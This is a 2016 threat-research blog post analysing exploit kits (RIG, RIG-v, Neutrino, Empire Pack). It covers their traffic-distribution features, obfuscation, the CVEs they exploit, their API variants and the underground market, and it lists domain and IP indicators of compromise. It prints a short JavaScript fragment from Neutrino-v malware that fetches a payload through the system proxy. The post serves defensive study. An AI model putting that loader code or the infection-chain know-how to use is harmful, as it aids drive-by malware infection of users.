2016-10-02 - Landscape

RIG evolves, Neutrino waves goodbye, Empire Pack appears

Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware.

Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016

RIG += internal TDS :

Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]
I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me)

Picture2: Blackhole - 2012 - Internal TDS illustration

but disappeared from the market with the end of Nuclear Pack

Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustration

and Angler EK

Picture 4 : Angler EK - Internal TDS illustration

This is a key feature for load seller. It is making their day to day work with traffic provider far easier .
It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.

Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country).

Picture 5: A Sutra TDS in action in 2012 - cf The path to infection

RIG += RC4 encryption, dll drop and CVE-2016-0189:

Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.
A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189

Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo

Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.

Neutrino waves goodbye ?

On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :

“we are closed. no new rents, no extends more”

This explains a lot. Here are some of my last Neutrino pass for past month.

Picture 8: Some Neutrino passes for past month and associated taxonomy tags in Misp

As you can see several actors were still using it…Now here is what i get for the past days :

Picture 9: Past days in DriveBy land
Not shown here, Magnitude is still around, mostly striking in Asia

Day after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground.

Picture 10: Last banner for Neutrino as of 2016-09-16

Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.

Side reminder : Neutrino disappeared from march 2014 till november 2014

A Neutrino Variant

Several weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino.

Picture 11: Neutrino-v pass on the 2016-09-21

Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits

Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder
Note the pnw26 with no associated binary data, the rubbish and additionalInfo

A Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523

Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api

 function k2(k) {
     var y = a(e + "." + e + "Request.5.1");
     y.setProxy(n);
     y.open("GET", k(1), n);
     y.Option(n) = k(2);
     y.send();
     if (200 == y.status) return Rf(y.responseText, k(n))
 };

Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)

I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it)

Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079x

The actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.

Empire Pack:

Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised.

Picture 15: King of Loads - Empire Pack Panel

Some might feel this interface quite familiar…A look a the favicon will give you a hint

Picture 16: RIG EK favicon on Empire Pack panel

Picture 17: RIG Panel

It seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.

[Speculation]
I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections.
[/Speculation]

RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, ~~I don’t know.~~ I am aware of 3 variants of the API to RIG

api.php : historical RIG
api3.php : RIG with internal TDS [ 2016-10-08 : This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]
remote_api.php : RIG-v

~~But Empire Pack might be api3, remote_api, or a bit of both of them~~.

By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there. :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing)

Conclusion

Let’s just conclude this post with statistics pages of two Neutrino threads

Picture 18: Neutrino stats - Aus focused thread - 2016-07-15

Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09

“We will be known forever by the tracks we leave”
Santee Sioux Tribe

Some IOCs

Date	Domain	IP	Comment
2016-10-01	szsiul.bluekill[.]top	137.74.55.6	Neutrino-v
2016-10-01	twqivrisa.pinkargue[.]top	137.74.55.7	Neutrino-v
2016-10-01	u0e1.wzpub4q7q[.]top	185.117.73.80	RIG-E (Empire Pack)
2016-10-01	adspixel[.]site	45.63.100.224	NeutrAds Redirector
2016-09-30	re.flighteducationfinancecompany[.]com	109.234.37.218	RIG-v
2016-09-28	add.alislameyah[.]org	193.124.117.13	RIG-v
2016-09-28	lovesdeals[.]ml	198.199.124.116	RIG-v
2016-09-27	dns.helicopterdog[.]com	195.133.201.23	RIG
2016-09-26	sv.flickscoop[.]net	195.133.201.41	RIG
2016-09-26	red.truewestcarpetcare[.]com	195.133.201.11	RIG-v
2016-09-26	oitutn.yellowcarry[.]top	78.46.167.130	Neutrino

Acknowledgements

Thanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf ( EmergingThreat/Proofpoint) for their inputs and help on multiple aspect of this post.

Edits

2016-10-03 :
Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.
Added explanation about the IP whitelisting on RIG API (it was not clear)
2016-10-08 :
Updated with gained information on Empire Pack
2016-11-01 :
RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4.
https://twitter.com/kafeine/status/790482708870864896

RIG panel

The only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)
2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)

RIG-E Behavioral

2016-12-03
RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.

2016-12-03 RIG-v Pre-landing

RIG’s Facelift - 2016-09-30 - SpiderLabs
Is it the End of Angler ? - 2016-06-11
Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01
Hello Neutrino ! - 2013-06-07
The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05